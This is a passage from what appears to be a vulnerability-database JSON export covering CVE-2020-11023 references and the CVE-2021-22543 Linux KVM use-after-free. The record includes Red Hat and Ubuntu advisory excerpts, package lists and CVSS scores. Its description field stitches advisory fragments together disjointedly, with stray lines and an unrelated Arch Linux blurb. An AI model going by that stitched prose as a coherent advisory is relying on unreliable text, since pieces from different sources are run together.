"url": "https://access.redhat.com/errata/rhsa-2022:6393"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22096"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23358"
},
{
"trust": 0.1,
"url": "https://github.com/pingidentity/ldapsdk/releases"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2806"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23358"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2806"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14295\u003e"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023\u003e"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/glsa/202007-03\u003e"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5\u003e"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14295"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org/\u003e."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_amq/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.amq.interconnect\u0026downloadtype=distributions\u0026version=1.9.0"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4211"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7656"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9283"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9283"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8203"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8203"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3369"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14040"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "171211"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "168304"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "159513"
},
{
"db": "PACKETSTORM",
"id": "158797"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163560",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171211",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170821",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170819",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170817",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168304",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158555",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159513",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158797",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-11023",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-04-29T00:00:00",
"db": "VULHUB",
"id": "VHN-163560",
"ident": null
},
{
"date": "2020-11-04T15:29:15",
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"date": "2023-03-02T15:19:19",
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"date": "2023-03-02T15:19:02",
"db": "PACKETSTORM",
"id": "171211",
"ident": null
},
{
"date": "2023-01-31T17:21:40",
"db": "PACKETSTORM",
"id": "170821",
"ident": null
},
{
"date": "2023-01-31T17:19:24",
"db": "PACKETSTORM",
"id": "170819",
"ident": null
},
{
"date": "2023-01-31T17:16:43",
"db": "PACKETSTORM",
"id": "170817",
"ident": null
},
{
"date": "2022-09-08T14:41:25",
"db": "PACKETSTORM",
"id": "168304",
"ident": null
},
{
"date": "2020-07-27T17:38:33",
"db": "PACKETSTORM",
"id": "158555",
"ident": null
},
{
"date": "2020-10-08T16:49:58",
"db": "PACKETSTORM",
"id": "159513",
"ident": null
},
{
"date": "2020-08-07T18:27:30",
"db": "PACKETSTORM",
"id": "158797",
"ident": null
},
{
"date": "2020-04-29T21:15:11.743000",
"db": "NVD",
"id": "CVE-2020-11023",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-03T00:00:00",
"db": "VULHUB",
"id": "VHN-163560",
"ident": null
},
{
"date": "2025-11-07T19:32:52.023000",
"db": "NVD",
"id": "CVE-2020-11023",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2020-4847-01",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "code execution, xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "171211"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "168304"
},
{
"db": "PACKETSTORM",
"id": "159513"
}
],
"trust": 0.7
}
}
VAR-202105-1451
Vulnerability from variot - Updated: 2026-04-10 23:33 An issue was discovered in the Linux kernel's KVM subsystem: improper handling of VM_IO|VM_PFNMAP VMAs in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. The Linux kernel is vulnerable to a buffer error; exploitation may allow information to be obtained, information to be tampered with, and service to be disrupted (DoS). Arch Linux is a lightweight and flexible Linux® distribution that tries to keep it simple. (BZ#2010171)
- These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
Bug Fix(es):
- Rebase package(s) to version: 1.2.23
Highlights, important fixes, or notable enhancements:
-
imgbase should not copy the selinux binary policy file (BZ#1979624) (BZ#1989397)
-
RHV-H has been rebased on Red Hat Enterprise Linux 8.4 Batch #2. (BZ#1975177)
-
8) - x86_64
-
Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Bug Fix(es):
-
kernel-rt: update RT source tree to the RHEL-8.4.z source tree (BZ#1985050)
-
kernel-rt: Merge mm/memcg: Fix kmem_cache_alloc() performance regression (BZ#1987102)
-
8.2) - aarch64, noarch, ppc64le, s390x, x86_64
Bug Fix(es):
-
[Regression] RHEL8.2 - ISST-LTE:pVM:diapvmlp83:sum:memory DLPAR fails to add memory on multiple trials [mm/memory_hotplug.c:1163] (mm-) (BZ#1930169)
-
Every server is displaying the same power levels for all of our i40e 25G interfaces. 10G interfaces seem to be correct. Ethtool version is 5.0 (BZ#1967100)
-
s390/uv: Fix handling of length extensions (BZ#1975657)
-
RHEL 8.3 using FCOE via a FastLinQ QL45000 card will not manually scan in LUN from Target_id's over 8 (BZ#1976265)
-
Backport "tick/nohz: Conditionally restart tick on idle exit" to RHEL 8.5 (BZ#1978711)
-
rhel8.3: phase 2 netfilter backports from upstream (BZ#1980323)
-
xfrm: backports from upstream (BZ#1981841)
Enhancement(s):
-
[8.2.z] Incorrect parsing of ACPI HMAT table reports incorrect kernel WARNING taint (BZ#1943702)
-
Only selected patches from [IBM 8.4 FEAT] ibmvnic: Backport FW950 and assorted bug fixes (BZ#1980795)
-
========================================================================== Ubuntu Security Notice USN-5071-3 September 22, 2021
linux-raspi, linux-raspi-5.4 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in the Linux kernel.
Software Description: - linux-raspi: Linux kernel for Raspberry Pi (V8) systems - linux-raspi-5.4: Linux kernel for Raspberry Pi (V8) systems
Details:
It was discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. An attacker who could start and control a VM could possibly use this to expose sensitive information or execute arbitrary code. (CVE-2021-22543)
Murray McAllister discovered that the joystick device interface in the Linux kernel did not properly validate data passed via an ioctl(). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code on systems with a joystick device registered. (CVE-2021-3612)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 20.04 LTS: linux-image-5.4.0-1043-raspi 5.4.0-1043.47 linux-image-raspi 5.4.0.1043.78 linux-image-raspi2 5.4.0.1043.78
Ubuntu 18.04 LTS: linux-image-5.4.0-1043-raspi 5.4.0-1043.47~18.04.1 linux-image-raspi-hwe-18.04 5.4.0.1043.46
After a standard system update you need to reboot your computer to make all the necessary changes.
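As a hedged sketch of how the fixed versions above can be checked, the following compares an installed kernel package version against the USN-5071-3 fixed build for Ubuntu 20.04 LTS using GNU `sort -V`. The `version_ge` helper and the hard-coded `installed` string are illustrative, not part of any advisory tooling; in practice the installed version would come from `dpkg-query`.

```shell
#!/bin/sh
# Sketch: is an installed kernel package at or above the fixed version
# from USN-5071-3 (5.4.0-1043.47 for Ubuntu 20.04 LTS)?
FIXED="5.4.0-1043.47"

# Succeeds (exit 0) when $1 >= $2 in version order, via GNU sort -V:
# the smaller of the two versions sorts first, so if $2 is first,
# $1 must be greater than or equal to it.
version_ge() {
    [ "$(printf '%s\n' "$1" "$2" | sort -V | head -n1)" = "$2" ]
}

# Illustrative value; on a real system obtain it with e.g.:
#   dpkg-query -W -f='${Version}' linux-image-5.4.0-1043-raspi
installed="5.4.0-1043.47"

if version_ge "$installed" "$FIXED"; then
    echo "patched"
else
    echo "update required"
fi
```

On Debian-family systems `dpkg --compare-versions "$installed" ge "$FIXED"` performs the same check with the distribution's own version-ordering rules; the `sort -V` form is used here only to keep the sketch self-contained.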
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 7.7) - ppc64le, x86_64
- Description:
This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2021:3987-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:3987 Issue date: 2021-10-26 CVE Names: CVE-2019-20934 CVE-2020-36385 CVE-2021-3653 CVE-2021-3656 CVE-2021-22543 CVE-2021-37576 =====================================================================
- Summary:
An update for kernel is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64 Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64 Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64 Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64
- Description:
The kernel packages contain the Linux kernel, the core of any Linux operating system.
Bug Fix(es):
-
A race between i40e_ndo_set_vf_mac() and i40e_vsi_clear() in the i40e driver causes a use after free condition of the kmalloc-4096 slab cache. (BZ#1980333)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
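After rebooting, one way to confirm the running kernel is at the fixed build (3.10.0-1062.59.1.el7 in this advisory) is to compare the `uname -r` string, minus its trailing architecture component, against that NVR. This is a sketch: the `strip_arch` and `at_least_fixed` helpers are illustrative, and the check assumes the input ends in an architecture suffix as RHEL `uname -r` output does.

```shell
#!/bin/sh
# Sketch: does a uname -r style kernel release string meet the fixed
# build 3.10.0-1062.59.1.el7 from this advisory?
FIXED="3.10.0-1062.59.1.el7"

# uname -r on RHEL reports e.g. 3.10.0-1062.59.1.el7.x86_64;
# drop the final dot-separated component (the architecture).
strip_arch() {
    printf '%s\n' "$1" | sed 's/\.[^.]*$//'
}

# Succeeds when the stripped release sorts at or after FIXED.
at_least_fixed() {
    [ "$(printf '%s\n' "$(strip_arch "$1")" "$FIXED" | sort -V | head -n1)" = "$FIXED" ]
}

at_least_fixed "3.10.0-1062.59.1.el7.x86_64" && echo "kernel at fixed level"
```

A real system would pass `"$(uname -r)"` instead of the literal string; `sort -V` approximates, but does not exactly reproduce, RPM's own version-comparison algorithm, so treat this as a quick sanity check rather than an authoritative audit.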
- Package List:
Red Hat Enterprise Linux Server AUS (v. 7.7):
Source: kernel-3.10.0-1062.59.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm
kernel-doc-3.10.0-1062.59.1.el7.noarch.rpm

x86_64:
bpftool-3.10.0-1062.59.1.el7.x86_64.rpm
bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm
perf-3.10.0-1062.59.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
python-perf-3.10.0-1062.59.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server E4S (v. 7.7):
Source: kernel-3.10.0-1062.59.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm
kernel-doc-3.10.0-1062.59.1.el7.noarch.rpm

ppc64le:
bpftool-3.10.0-1062.59.1.el7.ppc64le.rpm
bpftool-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-bootwrapper-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-debug-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-debug-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-devel-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-headers-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-tools-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-tools-libs-3.10.0-1062.59.1.el7.ppc64le.rpm
perf-3.10.0-1062.59.1.el7.ppc64le.rpm
perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
python-perf-3.10.0-1062.59.1.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm

x86_64:
bpftool-3.10.0-1062.59.1.el7.x86_64.rpm
bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm
perf-3.10.0-1062.59.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
python-perf-3.10.0-1062.59.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server TUS (v. 7.7):
Source: kernel-3.10.0-1062.59.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm
kernel-doc-3.10.0-1062.59.1.el7.noarch.rpm

x86_64:
bpftool-3.10.0-1062.59.1.el7.x86_64.rpm
bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm
perf-3.10.0-1062.59.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
python-perf-3.10.0-1062.59.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 7.7):
x86_64:
bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional E4S (v. 7.6):
ppc64le:
bpftool-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-debug-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-debug-devel-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
kernel-tools-libs-devel-3.10.0-1062.59.1.el7.ppc64le.rpm
perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm

x86_64:
bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional TUS (v. 7.7):
x86_64:
bpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2019-20934
https://access.redhat.com/security/cve/CVE-2020-36385
https://access.redhat.com/security/cve/CVE-2021-3653
https://access.redhat.com/security/cve/CVE-2021-3656
https://access.redhat.com/security/cve/CVE-2021-22543
https://access.redhat.com/security/cve/CVE-2021-37576
https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBYXew09zjgjWX9erEAQh/NRAAlpTOJdaVIZiu4IJtVrtRh2JGkgTlL2Pi
KIpqyIeBFsUwRh0pg9GE10q4NRk/DqMYTXvc2GJaNUZlRbzEhLxZXKqksfea6kmo
wwGdORkerZrbE8QYF/FRC/6Bxi99lvoH0rSEeJeX0bM6vVwu9ubp7Xbdp4hmq08S
1VsG5ftGK6hQJPyxVDgPIHK1FHE5dVz1puyM10eY5NgabKCdD8oCC9/OL1hxFjAv
ADTfFombilFItZoYa9rQdpoQ7s5CBZ1H6VbA+d9CvUltfzRzr6EUflL/rM3af3s1
PTSGqTSqdAZRoebwFvqKlHSoK2B7Wrinxs0kIGbvf3S2MbGklfzb6GaB4QZZ490T
WRuTiJZTvMP0jqQyW0nTCMbxfqo3NgKbQt2wQSGYYDlwq65vhuuQAghGVPEoBPhS
T9inwoSthoj7uxni1E58TXwPhzfEPXSTAkEZvu05BLt1AXRA+RrNH/B7VIHx30oX
fkdz6MFeO/SWIb/CWf5YQVD3Xfsk+9rg2JWGWjnAE2WV9lhsVqhlidL36uaL6kmA
LGrb/ZQcsVIPIM+HQRme15MBsg3GervoIHWkWOPbXvU4fYHxID2YkLMZQ6vtGHE2
DHe1+11yo2WKvdWB5nrbsIDBYBJLKT12DxsbycCeH2rLS7qDsfw/XDshAaFnPXZM
G9cg8fFnilE=
=hTrt
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 1.0,
"vendor": "linux",
"version": "2021-05-18"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "baseboard management controller",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": null,
"trust": 0.8,
"vendor": "fedora",
"version": null
},
{
"_id": null,
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "NVD",
"id": "CVE-2021-22543"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "164565"
},
{
"db": "PACKETSTORM",
"id": "163926"
},
{
"db": "PACKETSTORM",
"id": "163770"
},
{
"db": "PACKETSTORM",
"id": "164469"
},
{
"db": "PACKETSTORM",
"id": "163995"
},
{
"db": "PACKETSTORM",
"id": "164666"
},
{
"db": "PACKETSTORM",
"id": "164652"
}
],
"trust": 0.7
},
"cve": "CVE-2021-22543",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2021-22543",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-380980",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2021-22543",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-22543",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-22543",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-22543",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202105-1684",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-380980",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
